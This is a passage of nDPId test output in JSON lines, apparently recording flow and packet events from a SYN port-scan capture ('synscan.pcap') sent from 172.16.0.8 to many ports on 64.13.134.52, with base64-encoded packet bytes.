+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsOMAAADoG1bKsEAAIQA2GNIzSgBDdUoMYAAAAAGACDACsfgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060763,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_packet_id":1,"flow_last_seen":1278275060763,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060763,"pkt":"ACYLMQczACWzv5HuCABFAAAsMaMAACoG7M+sEAAIQA2GNIzSBhTdUoMYAAAAAGACDAAmewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060764,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_packet_id":1,"flow_last_seen":1278275060764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060764,"pkt":"ACYLMQczACWzv5HuCABFAAAsCNAAADYGCaOsEAAIQA2GNIzSA\/7dUoMYAAAAAGACDAAokQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAs4qIAADcGLtCsEAAIQA2GNIzTBALdU4MZAAAAAGACEAAkigAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsLe8AADIG6IOsEAAIQA2GNIzTITTdU4MZAAAAAGACDAALWAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAss7UAADIGYr2sEAAIQA2GNIzTFrfdU4MZAAAAAGACDAAV1QAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wAAACUGUHKsEAAIQA2GNIzSBE7dUoMYAAAAAGACCAAsQQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsGdwAADgG9pasEAAIQA2GNIzS1w\/dUoMYAAAAAGACBABdfwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsiwEAAC0GkHGsEAAIQA2GNIzSDSvdUoMYAAAAAGACCAAjZAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsYX4AACoGvPSsEAAIQA2GNIzSJyndUoMYAAAAAGACDAAFZgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsvdoAACUGZZisEAAIQA2GNIzSAmjdUoMYAAAAAGACCAAuJwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsRewAADEG0YasEAAIQA2GNIzSBA\/dUoMYAAAAAGACCAAsgAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsi\/0AADsGgXWsEAAIQA2GNIzSHcvdUoMYAAAAAGACEAAKxAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsouwAADMGcoasEAAIQA2GNIzSJ+fdUoMYAAAAAGACEAAAqAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsu48AACwGYOOsEAAIQA2GNIzSGiTdUoMYAAAAAGACBAAaawAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAs1UEAADAGQzGsEAAIQA2GNIzSE5HdUoMYAAAAAGACBAAg\/gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsf\/4AADcGkXSsEAAIQA2GNIzSCRPdUoMYAAAAAGACEAAffAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAstkgAACkGaSqsEAAIQA2GNIzSIGLdUoMYAAAAAGACCAAQLQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAso8MAACYGfq+sEAAIQA2GNIzSB\/vdUoMYAAAAAGACDAAklAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAs1+sAACYGSoesEAAIQA2GNIzSBArdUoMYAAAAAGACDAAohQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsGmoAACUGCQmsEAAIQA2GNIzSB4\/dUoMYAAAAAGACCAApAAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsuV0AACkGZhWsEAAIQA2GNIzTBHvdU4MZAAAAAGACCAAsEQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAspJsAACsGeNesEAAIQA2GNIzTAw\/dU4MZAAAAAGACEAAlfQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsLg8AACoG8GOsEAAIQA2GNIzTGojdU4MZAAAAAGACDAASBAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 